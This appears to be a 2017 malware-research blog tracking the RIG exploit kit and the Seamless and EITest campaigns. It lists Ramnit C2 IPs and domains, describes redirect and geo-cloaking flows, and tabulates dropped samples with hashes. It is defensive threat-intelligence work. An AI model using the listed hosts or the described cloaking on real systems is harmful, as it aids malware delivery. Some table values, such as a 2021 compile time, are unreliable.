2017年8月5日土曜日

Malware dropped by RIG(2017 July)

These are malware that I drop on RIG which I observed in July .

If you have additional information please contact Twitter(@nao_sec).

2017年7月22日土曜日

Seamless Campaign Dropping Ramnit Continuously 1

Please read the previous blog about malware in May and June.
http://www.nao-sec.org/2017/07/malware-dropped-by-rig2017-may-june.html

The addresses of the known C2 servers that are introduced in some blogs are as follows

  • 142.4.204.195
  • 34.194.213.50 - aofmfaoc.com
  • 87.106.190.153
  • 62.173.141.41 – gssbjwhoose.com
  • 185.118.65.143 - hdyejdn638ir8.com

Refer to the following

Domain name is changed immediately. IP address is used several times. I'll report  malware C2 related to Ramnit that connect with these C2.

Network Based IOCs

  • 162.255.119.204 - onaxjbfinflx.com
  • 162.255.119.206 - lwqmgevnftflytvbgs.com
  • 162.255.119.18 - sinjydtrv.com
  • 162.255.119.193 - mrthpcokvjc.com
  • 185.118.66.222 - xomeommdilsq.com
  • 166.78.144.80 - ydchosmhwljjrq.com
  • 185.20.225.124 - g283yr84iri4i.com
  • 62.173.141.42 - ypfptjsuthmaaebx.com

Malware Correlation





2017年7月12日水曜日

Malware dropped by RIG(2017 May-June)

These are malware that I drop on RIG which I observed between May and June. If you have additional information please contact Twitter(@nao_sec).

2017年7月5日水曜日

Seamless localized to Japan

An article published by malwarebreakdown two days ago was very interesting.
https://malwarebreakdown.com/2017/07/03/seamless-campaign-leads-to-rig-ek-at-188-225-79-43-and-drops-ramnit/

I supplement that article. This is an article for that.

---

In that wonderful article some redirect flows and the latter half were introduced. I introduce the flow of the first half.

First redirected to "194.58.60.51/usa" by some malicious Ad. "usa" looks like a general web site, showing part of the actual code.



It looks like a general code, but there is an obfuscated code. It's decoded as follows.



This looks like code for Google Analytics, but it's actually different. It's sending a POST request to "usa".



It uses JavaScript to acquire time zone information and send it. When sending Japanese information at this time, it will be redirected to a general website. In the case of the USA it will lead to the next flow.

This is redirecting to "outedward-engrees.com". When you access "outedward-engrees.com", it looks like this.



Please see the malwarebreakdown article after this :)

---

Well, I had a chance interesting discovery. I investigated "194.58.60.51" in VirusTotal. Then I got this information.


Surprisingly, "japan.php" exists on the same server!

"japan.php" code is exactly the same as "usa", but you have to set the time zone to be sent to Japan so that you will be connected to RigEK.



"usa" was redirected to "signup3.php", but "japan.php" redirects to "signup1.php".

The dropped malware is Ramnit as usual.
https://www.hybrid-analysis.com/sample/3f949006c99d03b15ea4a1a11b40f1cf420573d2c86f1025a3b82badf18dc361?environmentId=100
https://virustotal.com/en/file/3f949006c99d03b15ea4a1a11b40f1cf420573d2c86f1025a3b82badf18dc361/analysis/1499245648/

---

P.S. added pcap link
https://gist.github.com/koike/8f3fcbb2e6906e29155a57d6f87df396


Localization other than Japan may also exist.
If you knew, please let me know ;)

2017年5月25日木曜日

New EITest's Cloaking

First

(In the case of JST) EITest has been observed again since last night, but many researchers say that they can not observe it. In conclusion, It seems that EITest this time is targeting only some Asian countries including Japan.

Experiment

I accessed EITest 's Compromised site using IP from various countries, and the results are as follows.

Japan



HongKong



UK



America



Netherlands



Singapore



Finally

I found out that there were three types of EITest inject codes. They are switched with Geo. I don't know the details, but UK and America seem to be redirected to a different place from RigEK. It seems that only some Asian countries, such as Japan and Hong Kong, are redirecting to RigEK.

2017年5月24日水曜日

Analyzing Rig Exploit Kit vol.3

First

Although I introduced RigEK's behavior several times so far, I will introduce about various changes. Please refer to those who do not know the previous RigEK.

https://github.com/nao-sec/RigEK/blob/master/README-en.md

Step 0

The beginning of this incident was @BroadAnalysis tweet.

EITest was again observed.

Rig Exploit Kit via EiTest campaign from 109.234.36.68 delivers Mole ransomware

I have not observed EITest since April 28. It has been observed again, please see the blog of @Broad Analysis for specific traffic.

What I will introduce this time is about the change in RigEK's behavior. I have been continuously observing Decimal IP and Seamless but they have been unable to observe from several days ago. It seems that RigEK was changing while I could not observe them.

Step 1

The beginning is nostalgic EITest's code.



The inject code of EITest dynamically generates an iframe and redirects it to RigEK. Previously, I returned a landing page containing JavaScript that was obfuscated by this redirect to the user, but now it is different.



Let's follow the process.

Step 2

This html is fired from the iframe of line 12. When the iframe is loaded, the onload event fires and start() is called. start() is as follows.



Call getBrowser() and check the user's fingerprint. Let's see getBrowser().



RigEK uses the information obtained in this way to check whether the user is the target environment. If the user does not misrepresent browser information and the browser is IE, a form tag is created and redirected to the next stage by HTTP POST method.

Step 3

After that, it is the same as before.The html which contains the obfuscated JavaScript is loaded, attacks which attack some kind of vulnerability are done.The exploit code used seems not to change in particular.

Finally

In this way, RigEK has changed to use POST request.This process is not uncommon, but it shows that RigEK is still evolving.I will continue to track RigEK in the future.

P.S.

Regarding the change of RigEK this time, my mal-getter is already supported :)

https://github.com/nao-sec/mal_getter

2017年5月17日水曜日

Malware dropped by RIG(2017 Feb-Apr)

These are malware that I drop on RIG which I observed between February and April.
I do not know how trustworthy it is, but some malware is compiled just before tampering.
Some families have older compile times.

EITest

familyfound_time(JST)compile timetweetVirus TotalHybrid Analysisreference
Dreambot2017/02/23 8:112017:02:23 01:44:03+01:00https://twitter.com/nao_sec/status/834574645848272897https://www.virustotal.com/en-gb/file/a51f24f534c3db9851fc3bea661c8b1aead926eba918c722d58a31693defb13a/analysis/https://www.hybrid-analysis.com/sample/a51f24f534c3db9851fc3bea661c8b1aead926eba918c722d58a31693defb13ahttp://www.malware-traffic-analysis.net/2017/02/23/index.html
Ursnif2017/02/27 (2017/02/25 5:26)2017:02:26 06:20:43+01:00https://twitter.com/nao_sec/status/835681676185382912https://www.virustotal.com/en-gb/file/cec0a5b62eab199796b0b1f2732f40d70c7a7ad47a1bbe508e69a33528f7d4e5/analysis/https://www.hybrid-analysis.com/sample/cec0a5b62eab199796b0b1f2732f40d70c7a7ad47a1bbe508e69a33528f7d4e5http://www.malware-traffic-analysis.net/2017/02/27/index.html
CryptoShield2017/02/27 1:222017:02:28 11:32:32+01:00https://twitter.com/nao_sec/status/835889445735817217https://www.virustotal.com/en-gb/file/177782be48ed39b66a70c51f592f0b3ac31a8aefe5f809eb45ee9d8bb18c2946/analysis/https://www.hybrid-analysis.com/sample/177782be48ed39b66a70c51f592f0b3ac31a8aefe5f809eb45ee9d8bb18c2946http://www.malware-traffic-analysis.net/2017/02/28/index.html
Cerber2017/03/18 3:072014:09:11 08:28:00+01:00https://www.virustotal.com/en-gb/file/409a71c97dee87fbafa63e8d9025f63e7eb21dce3239b4952296db217a744264/analysis/https://www.hybrid-analysis.com/sample/409a71c97dee87fbafa63e8d9025f63e7eb21dce3239b4952296db217a744264http://www.malware-traffic-analysis.net/2017/03/20/index.html
Spora matrix2017/04/06 11:112012:07:26 15:06:56+01:00 2014:09:11 08:28:00+01:00https://www.virustotal.com/en-gb/file/1809aa1e4d1ed14722417ee284cea229fac1c09b8c14434f7e1b2ea8547c5aeb/analysis/https://www.hybrid-analysis.com/sample/1809aa1e4d1ed14722417ee284cea229fac1c09b8c14434f7e1b2ea8547c5aebhttp://www.malware-traffic-analysis.net/2017/04/07/index.html
matrix2017/04/082017:04:08 04:32:16+01:00https://www.virustotal.com/en-gb/file/efa729e2537a939a2c5e0acc81a99419d7477b6ab5fd4089bd85fd85087c9bcc/analysis/https://www.hybrid-analysis.com/sample/efa729e2537a939a2c5e0acc81a99419d7477b6ab5fd4089bd85fd85087c9bcchttp://www.malware-traffic-analysis.net/2017/04/07/index.html
matrix2017/04/082017:04:08 04:32:16+01:00https://www.virustotal.com/en-gb/file/1ec63d6d3d85b014e743d291c79d5d350e13167a0343873e8303098e74c72557/analysis/https://www.hybrid-analysis.com/sample/1ec63d6d3d85b014e743d291c79d5d350e13167a0343873e8303098e74c72557
matrix2017/04/082017:04:08 04:19:19+01:00https://www.virustotal.com/en-gb/file/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47/analysis/https://www.hybrid-analysis.com/sample/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47
QuantLoader Spora2017/04/15 0:582016:03:09 11:15:32+01:00  2015:10:19 04:22:40+01:00https://www.virustotal.com/en-gb/file/f63e5ca44a32340c975bf5613b1cfd2202762e4a42f1f21deb71de18894b9304/analysis/
https://www.virustotal.com/en-gb/file/2181633d9bdb10fd4420a6aef5d5fa9e9a69ab7de4e99063ae44716188e394e1/analysis/
https://www.hybrid-analysis.com/sample/f63e5ca44a32340c975bf5613b1cfd2202762e4a42f1f21deb71de18894b9304https://www.hybrid-analysis.com/sample/2181633d9bdb10fd4420a6aef5d5fa9e9a69ab7de4e99063ae44716188e394e1http://www.malware-traffic-analysis.net/2017/04/15/index.html
QuantLoader Spora2017/04/16(2017/04/05 7:56)2017:02:26 02:21:55+01:00 2021:01:27 12:31:12+01:00https://www.virustotal.com/en-gb/file/26134f16143eb1d5fc2a13f51929166db18a9e04ea381a9bd23cabea24508879/analysis/
 https://www.virustotal.com/en-gb/file/8a2eafed0b59841f76b0c23bddeb9e3cadfebba4c04a7d24694273642ffec109/analysis/
https://www.hybrid-analysis.com/sample/26134f16143eb1d5fc2a13f51929166db18a9e04ea381a9bd23cabea24508879https://www.hybrid-analysis.com/sample/8a2eafed0b59841f76b0c23bddeb9e3cadfebba4c04a7d24694273642ffec109http://www.malware-traffic-analysis.net/2017/04/16/index.html
Spora2017/4/18(2017/04/07 22:51:00)2015:10:19 04:22:40+01:00https://twitter.com/nao_sec/status/837500077107113984https://www.virustotal.com/en-gb/file/bab239409230dac6733cd1492b154dbdd83e2dffc38e4d95bafdec98554c11ab/analysis/https://www.hybrid-analysis.com/sample/bab239409230dac6733cd1492b154dbdd83e2dffc38e4d95bafdec98554c11abhttp://malware-traffic-analysis.net/2017/04/18/index.html
mole2017/04/26 10:212017:04:25 20:59:52+01:00https://twitter.com/nao_sec/status/857042029141819393https://www.virustotal.com/en-gb/file/ca6624ec06c043bf9624260a7b6f437cf7c29d5909306ebd7972f113e4834ec3/analysis/https://www.hybrid-analysis.com/sample/ca6624ec06c043bf9624260a7b6f437cf7c29d5909306ebd7972f113e4834ec3
QuantLoader2017/04/26 13:282017:04:23 15:26:57+01:00https://twitter.com/nao_sec/status/857088936786747392https://www.virustotal.com/en-gb/file/7546df1244096b3c70f7f5da33d367ce43bf4bfd397568a4adf51a23fa3cd0af/analysis/https://www.hybrid-analysis.com/sample/7546df1244096b3c70f7f5da33d367ce43bf4bfd397568a4adf51a23fa3cd0af
mole2017/04/27 14:282017:04:26 21:08:06+01:00https://twitter.com/nao_sec/status/857466502840057856https://www.virustotal.com/en-gb/file/57d65f730b3a1d67679ea722cdb562a9e161b11cdf993ef773271589895a3572/analysis/https://www.hybrid-analysis.com/sample/57d65f730b3a1d67679ea722cdb562a9e161b11cdf993ef773271589895a3572
mole2017/04/28 14:402017:04:27 20:36:35+01:00https://twitter.com/nao_sec/status/857831871077470208https://www.virustotal.com/en-gb/file/2cb9d2943e81b990ec737eced2e49ec556cec22c21ecc7027347485b32e63d36/analysis/https://www.hybrid-analysis.com/sample/2cb9d2943e81b990ec737eced2e49ec556cec22c21ecc7027347485b32e63d36
mole2017/04/28 22:562017:04:28 11:54:17+01:00https://twitter.com/nao_sec/status/857956617706274816https://www.virustotal.com/en-gb/file/4ee80172598ec7826ad82d4a94c2816b079f9d0557b12d2702eed1365306ebec/analysis/https://www.hybrid-analysis.com/sample/4ee80172598ec7826ad82d4a94c2816b079f9d0557b12d2702eed1365306ebec

pseudoDarkleech

familyfound_time(JST)compile timetweetVirus TotalHybrid Analysisreference
Cerber2017/02/22 14:392016:04:03 21:18:59+01:00https://twitter.com/nao_sec/status/834277482446532608https://www.virustotal.com/en-gb/file/009cba636ff7b220efb4d24783e77af2471052ffd17fd3d721d84b82ba348af3/analysis/https://www.hybrid-analysis.com/sample/009cba636ff7b220efb4d24783e77af2471052ffd17fd3d721d84b82ba348af3http://www.malware-traffic-analysis.net/2017/02/22/index.html
Cerber2017/02/27 0:312016:04:03 21:18:53+01:00https://twitter.com/nao_sec/status/838535748538097665https://www.virustotal.com/en-gb/file/f7124736a95c472f4c98835786daccdbe751bbd0da4cb500fa0b35d7700d46ef/analysis/https://www.hybrid-analysis.com/sample/f7124736a95c472f4c98835786daccdbe751bbd0da4cb500fa0b35d7700d46efhttp://www.malware-traffic-analysis.net/2017/02/27/index.html
Cerber2017/03/20 1:082014:10:07 05:40:10+01:00https://twitter.com/nao_sec/status/834574488230506496https://www.virustotal.com/en-gb/file/1c693f3448d0bd9f300f9f8d752f50db352aea7a8c1961f369291d8e6010fd0d/analysis/https://www.hybrid-analysis.com/sample/1c693f3448d0bd9f300f9f8d752f50db352aea7a8c1961f369291d8e6010fd0dhttp://www.malware-traffic-analysis.net/2017/03/20/index2.html

GoodMan